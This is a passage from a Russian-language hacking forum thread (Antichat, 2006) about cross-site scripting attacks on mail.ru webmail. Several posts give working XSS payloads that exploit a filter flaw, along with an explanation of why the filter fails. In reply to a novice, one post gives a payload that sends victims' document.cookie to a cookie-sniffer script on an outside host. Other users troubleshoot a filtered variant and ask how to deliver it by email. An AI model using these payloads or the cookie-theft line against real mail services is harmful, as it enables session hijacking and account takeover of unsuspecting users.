ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 21.02.2006, 17:24
Аватар для Dronga
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464

Репутация: 714


Отправить сообщение для Dronga с помощью ICQ
По умолчанию

Да помог то помог, только не мне, опять всё повторится... И помоему это не для всех браузеров, сейчас погляжу. Дело в img/src - эту конструкцию не все браузеры принимают, IE на ура, а вот остальные не примут вроде.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
 
Ответить с цитированием

  #32  
Старый 15.07.2006, 19:46
Аватар для Elekt
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию

Решено спустить в общее.

Думаю, Всем будет интересно почитать историю лома mail.ru.

Кстати, данные ХSS работают на других менее "продвинутых" почтовиках
Удачных подвигов!

Помните, данная информация предназначена только для ознакомления. Мы не рекомендуем Вам испытывать данные XSS-эксплоиты.

Powered by Antichat.ru
 
Ответить с цитированием

  #33  
Старый 16.07.2006, 02:21
Аватар для Dronga
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464

Репутация: 714


Отправить сообщение для Dronga с помощью ICQ
По умолчанию

Наконец-то в паблике =) Сколько шуму было из этой темы. Как раз на момент её создания alsa основал АМА (пожалуй, самый закрытый на сегодня раздел) и я был первым кто в него зашел и первым моим постом в абсолютно пустом разделе стала усовершенствованная XSS. Так хотелось приписать "Первый нах!", ну вы понимаете, момент ведь исторический.

На открытие опять-таки навел Майор, он уже всё обыграв в голове и поняв просто спросил, почему работает это:
Код HTML:
 <font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))">
.... И меня осенило =) Вот так всё и получается.

Код HTML:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')>
Вот она работала под всеми браузерами, включая FF. Это была бомба к которой имели доступ всего 9 человек с форума =)

Фильтр терялся когда в атрибуте натыкался на закрывающий тег знак > и после него уже не смотрел.. А с точки зрения браузера всё что в кавычках - это атрибут. Поэтому генерилась ошибка и добавив обработчик onerror мы добивались своего =) Из МОА никто не догадался, хотя всё было у них перед глазами)

Пусть теперь все видят и знают что и как обсуждается в закрытых разделах. Ну и конечно стремятся туда. Кстати, из всего этого материала рукой подать до ещё одной активной XSS, но только под IE (Greetz to ZaCo =)

Удачи, господа)
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!

Последний раз редактировалось Dronga; 16.07.2006 в 03:31..
 
Ответить с цитированием

  #34  
Старый 16.07.2006, 13:33
Аватар для Зверь
Зверь
Новичок
Регистрация: 18.05.2006
Сообщений: 16
Провел на форуме:
71601

Репутация: 1
По умолчанию

<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> ,подскажите пожалуйста,что надо вставлТь вместо xss ?
 
Ответить с цитированием

  #35  
Старый 16.07.2006, 13:42
Аватар для Dronga
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464

Репутация: 714


Отправить сообщение для Dronga с помощью ICQ
По умолчанию

Вообще вот такая запись:
Код HTML:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')>
Это просто наглядно, а вариаций тут может быть куча, можете попробовать даже вот так:
Код HTML:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(1)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('2')>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif	>"onerror=alert('3')>
Просто дело вашей фантазии.

Отвечаю на вопрос:
Код HTML:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=document.images[0].src="http://www.link.com/script_sniffer.php?cooki="+document.cookie;>
Что-то около того)
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!

Последний раз редактировалось Dronga; 16.07.2006 в 13:48..
 
Ответить с цитированием

  #36  
Старый 16.07.2006, 13:44
Аватар для Зверь
Зверь
Новичок
Регистрация: 18.05.2006
Сообщений: 16
Провел на форуме:
71601

Репутация: 1
По умолчанию

Огромное СПАСИБО!!!!
 
Ответить с цитированием

  #37  
Старый 27.07.2006, 23:24
Аватар для LeopardSS
LeopardSS
Познающий
Регистрация: 08.01.2006
Сообщений: 90
Провел на форуме:
1000758

Репутация: 16
По умолчанию

Честно говоря надоело через хсс, кто б че нового придумал гг
 
Ответить с цитированием

.....
  #38  
Старый 29.07.2006, 06:40
Аватар для dikiismok
dikiismok
Новичок
Регистрация: 28.07.2006
Сообщений: 1
Провел на форуме:
5151

Репутация: 0
По умолчанию .....

Не могу понять почему не срабатывает...


Код HTML:
<img src=\"xss\" width=0 height=0 style=\"top:expression(eval(this.sas));\" width=0 height=0 sas=\"this.src=\'xss\' document.cookie;this.sas=null\" alt=\'\'>
Вот этот код после майловского фильтра...
Код HTML:
<img src=\"xss\" width=0 height=0  xstyle=\"top:expression(eval(this.sas));\" width=0 height=0  sas=\"this.src=\"xss\" document.cookie;this.sas=null\" alt=\"\">

Последний раз редактировалось dikiismok; 29.07.2006 в 06:43..
 
Ответить с цитированием

  #39  
Старый 01.08.2006, 20:17
Аватар для Dronga
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464

Репутация: 714


Отправить сообщение для Dronga с помощью ICQ
По умолчанию

А ты не заметил, что style отфильтровался и стал xstyle?? Поэтому и не работает.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
 
Ответить с цитированием

  #40  
Старый 02.08.2006, 00:57
Аватар для AMbar
AMbar
Новичок
Регистрация: 07.05.2006
Сообщений: 7
Провел на форуме:
5670

Репутация: 1
По умолчанию

Не пойму, но как это все провети? не пойму отправляю письмо в вижео хтмл с кодом? обоснуйте по полочкам, плз
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
admin mail.ru ISRAEL Чужие Статьи 42 10.08.2005 05:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ